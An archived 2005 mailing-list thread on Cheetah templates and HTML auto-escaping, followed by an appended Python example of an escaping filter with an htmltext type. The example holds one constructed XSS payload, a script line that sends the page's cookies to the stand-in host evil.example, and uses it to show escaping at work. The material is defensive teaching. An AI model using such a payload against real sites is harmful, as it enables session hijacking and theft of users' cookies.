
[Cheetahtemplate-discuss] PTL/Cheetah article

  • mso@oz.net
    Message 1 of 3, Aug 3, 2005
      Here's an article I wrote about PTL and Cheetah.

      http://linuxgazette.net/117/orr.html


      --
      -- Mike Orr <mso@...>



      -------------------------------------------------------
      SF.Net email is Sponsored by the Better Software Conference & EXPO
      September 19-22, 2005 * San Francisco, CA * Development Lifecycle Practices
      Agile & Plan-Driven Development * Managing Projects & Teams * Testing & QA
      Security * Process Improvement & Measurement * http://www.sqe.com/bsce5sf
      _______________________________________________
      Cheetahtemplate-discuss mailing list
      Cheetahtemplate-discuss@...
      https://lists.sourceforge.net/lists/listinfo/cheetahtemplate-discuss
    • Shannon -jj Behrens
      Message 2 of 3, Aug 3, 2005
        Mike,

        You bring up a good point about auto escaping. I read about session
        injection attacks <http://www.acros.si/papers/session_fixation.pdf>,
        and a single XSS vulnerability anywhere within some
        subdomain.example.com makes it possible to hijack sessions for
        anyothersubdomain.example.com. It's probably better if we start
        erring on the side of overcaution when it comes to HTML escaping
        things.

        Hence, I think that perhaps:

        - a NameMapper filter should automatically escape things as you laid
        out in your article
        - each Cheetah method should return an htmltext instance so that its
        content doesn't get re-escaped

        Best Regards,
        -jj

        On 8/3/05, mso@... <mso@...> wrote:
        > Here's an article I wrote about PTL and Cheetah.
        >
        > http://linuxgazette.net/117/orr.html

        --
        I have decided to switch to Gmail, but messages to my Yahoo account will
        still get through.


      • Mike Orr
        Message 3 of 3, Aug 3, 2005
          Shannon -jj Behrens wrote:

          >You bring up a good point about auto escaping. I read about session
          >injection attacks <http://www.acros.si/papers/session_fixation.pdf>,
          >and a single XSS vulnerability anywhere within some
          >subdomain.example.com makes it possible to hijack sessions for
          >anyothersubdomain.example.com. It's probably better if we start
          >erring on the side of overcaution when it comes to HTML escaping
          >things.
          >
          >

          Tavis would have to add the htmltext module, perhaps under
          Cheetah.Utils. I don't know how he feels about that.

          If we include the C version, it would be one more thing to compile, but
          I suppose that's no big deal.

          >Hence, I think that perhaps:
          >
          >- a NameMapper filter should automatically escape things as you laid
          >out in your article
          >
          >

          Perhaps we can come up with a better name than HtmltextFilter.
          WebSafer? IntelligentWebSafe? Just kidding.

          >- each Cheetah method should return an htmltext instance so that its
          >content doesn't get re-escaped
          >
          >

          I suppose. It certainly works to assign htmltext instances as
          placeholder values. There may be an argument that we shouldn't presume
          that about all #def results, although PTL does the equivalent. The
          application I used the filter in doesn't have any #def methods so the
          issue never came up. But if a method result is fed to a function that
          insists on a string, there would be problems. I don't know how many of
          that sort of expectation people build into their templates.

          Of course, PTL also distinguishes between html functions and plain
          functions. Plain functions don't get any escaping. Cheetah doesn't
          have a formal way to distinguish between HTML output and non-HTML
          output. If it did we could make HtmltextFilter the default for HTML output.

          -- Mike Orr <mso@...>


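The auto-escaping design the two replies above discuss (a filter that escapes every placeholder, plus #def results typed as htmltext so that nested output is not escaped a second time), as an added worked example. This is not code from the thread, from Cheetah, or from Quixote/PTL: the `htmltext` class, `HtmlSafeFilter`, `fill`, `greeting`, `page`, `page_unfiltered` and the cookie-stealing payload are all stand-ins constructed for illustration. The `filter(val, **kw)` method merely mirrors the shape of Cheetah's Filter interface; Cheetah itself is not imported, so the block runs on a bare Python install.

```python
import html


class htmltext(str):
    """Marker type for strings that are already safe HTML markup.

    Modeled on the PTL/Quixote htmltext idea discussed in the thread; this is
    an illustrative stand-in, not the real module.  Being a str subclass, a
    value of this type still satisfies isinstance(x, str) checks downstream.
    """
    __slots__ = ()


def escape(val):
    """Escape one placeholder value for HTML, unless it is already htmltext.

    Returning htmltext makes the operation idempotent: escape(escape(x))
    escapes x exactly once, which is what prevents double escaping of nested
    template output.
    """
    if isinstance(val, htmltext):
        return val
    if val is None:
        return htmltext("")
    return htmltext(html.escape(str(val), quote=True))


class HtmlSafeFilter:
    """Assumed filter class with a filter(val, **kw) method, the shape of
    Cheetah's Filter interface; Cheetah is not imported in this example."""

    def filter(self, val, **kw):
        return escape(val)


FILTER = HtmlSafeFilter()


def fill(pieces, filt=FILTER):
    """Render a template given as a list of pieces.

    Literal markup written by the template author is passed in as htmltext and
    kept verbatim; every other piece is a placeholder value and goes through
    the filter.  The rendered result is itself htmltext.
    """
    return htmltext("".join(filt.filter(p) for p in pieces))


def greeting(name):
    """Stand-in for a Cheetah #def: returns htmltext, so a template that embeds
    its result does not escape the <b> tags a second time."""
    return fill([htmltext("<b>Hello, "), name, htmltext("</b>")])


def page(name, comment):
    """Top-level template that embeds the #def output and a second placeholder."""
    return fill([
        htmltext("<p>"), greeting(name), htmltext("</p>\n<p>"),
        comment, htmltext("</p>"),
    ])


def page_unfiltered(name, comment):
    """The same page with no filter at all: placeholders are interpolated verbatim."""
    return "<p><b>Hello, " + str(name) + "</b></p>\n<p>" + str(comment) + "</p>"


# Constructed sample input (not from the thread): a cookie-stealing payload of
# the kind the thread worries about, where one XSS hole lets injected script
# read the session cookie.
CONSTRUCTED_XSS_NAME = (
    '<script>new Image().src="//evil.example/?c="+document.cookie</script>'
)


if __name__ == "__main__":
    print(page("Bob", "first post"))
    print(page(CONSTRUCTED_XSS_NAME, 'say "hi" & <bye>'))
    print(page_unfiltered(CONSTRUCTED_XSS_NAME, "x"))
```

Two things the block makes concrete. First, because `htmltext` subclasses `str`, handing a #def result to a function that insists on a string still works, so the concern in the reply above is about code that checks `type(x) is str` or does its own escaping, not about plain string consumers. Second, the only way the filter can tell template markup from data is that the template itself marks its literal pieces as `htmltext`; that is exactly the formal HTML-versus-non-HTML output distinction the reply says Cheetah lacks, and the `page_unfiltered` function shows what happens without it.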